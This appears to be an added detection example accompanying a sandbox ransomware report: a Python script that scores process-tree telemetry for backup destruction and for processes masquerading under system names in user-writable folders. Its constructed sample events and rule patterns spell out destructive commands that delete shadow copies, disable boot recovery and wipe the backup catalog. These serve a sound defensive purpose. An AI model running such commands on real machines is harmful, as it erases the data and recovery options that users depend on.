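The shadow-copy deletion, boot-setting change and wbadmin activity that the graph attributes to the cmd.exe children of the dropped _usm.exe is the part of this report a detection engineer would turn into an alert. The following is an added example, not part of the Joe Sandbox report: a small process-telemetry detector that reconstructs the parent chain of each suspicious process and raises the severity when the chain passes through a user-writable directory, as it does here (winlogon.exe on the Desktop -> _usm.exe in AppData -> cmd.exe -> vssadmin.exe). The events, PIDs and command lines are constructed; the report shows process names and signature names but not the exact command lines, so the rule patterns are the common ransomware idioms, assumed rather than taken from the report, and the rule names are hypothetical.

```python
import re
from dataclasses import dataclass

# Added example, not part of the Joe Sandbox report. All events, PIDs and
# command lines are constructed; the report names the processes but does not
# show their command lines.


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the started executable
    cmdline: str


# (rule name, image basename, regex over the command line). The command-line
# idioms are common ransomware behaviour, assumed here, not taken from the report.
RULES = [
    ("shadow_copy_deletion", "vssadmin.exe", r"\bdelete\s+shadows\b"),
    ("shadow_storage_resize", "vssadmin.exe", r"\bresize\s+shadowstorage\b"),
    ("boot_recovery_disabled", "bcdedit.exe",
     r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures"),
    ("backup_catalog_deletion", "wbadmin.exe", r"\bdelete\s+(catalog|systemstatebackup)\b"),
]

# Core Windows process names malware likes to borrow; the submitted sample is
# called winlogon.exe but runs from the user's Desktop.
SYSTEM_NAMES = {"winlogon.exe", "svchost.exe", "lsass.exe", "csrss.exe", "services.exe"}

# Locations a dropper can write to without elevation.
USER_WRITABLE = re.compile(r"^c:\\users\\[^\\]+\\(appdata|desktop|downloads)\\", re.I)
WINDOWS_DIR = re.compile(r"^c:\\windows\\", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def match_rules(ev):
    """Return the names of every rule the event triggers."""
    base = basename(ev.image)
    hits = [name for name, image, pattern in RULES
            if base == image and re.search(pattern, ev.cmdline, re.I)]
    if base in SYSTEM_NAMES and not WINDOWS_DIR.match(ev.image):
        hits.append("system_name_masquerade")
    return hits


def ancestors(pid, by_pid):
    """Walk parent links from pid upward; stop at unknown or already-seen pids
    so that a reused or cyclic PID cannot loop forever."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ev = by_pid[pid]
        yield ev
        pid = ev.ppid


def detect(events):
    """Score each matching event by whether it, or anything above it in the
    tree, runs from a user-writable directory."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        hits = match_rules(ev)
        if not hits:
            continue
        chain = list(ancestors(ev.ppid, by_pid))
        dropped = next((a.image for a in chain if USER_WRITABLE.match(a.image)), None)
        from_user_dir = dropped is not None or bool(USER_WRITABLE.match(ev.image))
        findings.append({
            "pid": ev.pid,
            "rules": hits,
            "severity": "high" if from_user_dir else "medium",
            "dropped_ancestor": dropped,
            "chain": [basename(a.image) for a in chain],
        })
    return findings


# Constructed telemetry mirroring the report's tree: winlogon.exe (the sample)
# drops _usm.exe, which runs three cmd.exe instances. Two vssadmin invocations
# outside that chain show what does not fire, or fires at lower severity.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Users\user\Desktop\winlogon.exe", "winlogon.exe"),
    ProcEvent(300, 200, r"C:\Users\user\AppData\Local\Temp\_usm.exe", "_usm.exe"),
    ProcEvent(400, 300, r"C:\Windows\System32\cmd.exe", "cmd.exe /c vssadmin delete shadows /all /quiet"),
    ProcEvent(500, 400, r"C:\Windows\System32\vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    ProcEvent(401, 300, r"C:\Windows\System32\cmd.exe", "cmd.exe /c bcdedit /set {default} recoveryenabled no"),
    ProcEvent(501, 401, r"C:\Windows\System32\bcdedit.exe", "bcdedit /set {default} recoveryenabled no"),
    ProcEvent(402, 300, r"C:\Windows\System32\cmd.exe", "cmd.exe /c wbadmin delete catalog -quiet"),
    ProcEvent(502, 402, r"C:\Windows\System32\wbadmin.exe", "wbadmin delete catalog -quiet"),
    ProcEvent(600, 100, r"C:\Windows\System32\vssadmin.exe", "vssadmin list shadows"),
    ProcEvent(700, 100, r"C:\Windows\System32\vssadmin.exe", "vssadmin delete shadows /for=C: /oldest"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["severity"], f["pid"], f["rules"], "<-", " <- ".join(f["chain"]))
```

Matching on the image that actually executes the command (vssadmin.exe, not the cmd.exe that launched it) keeps the rule from double-firing on the intermediate shell, while the ancestor walk still surfaces the dropped _usm.exe that explains why the command ran. An administrator running `vssadmin delete shadows` from an explorer.exe-rooted tree still produces a finding, but only at medium severity.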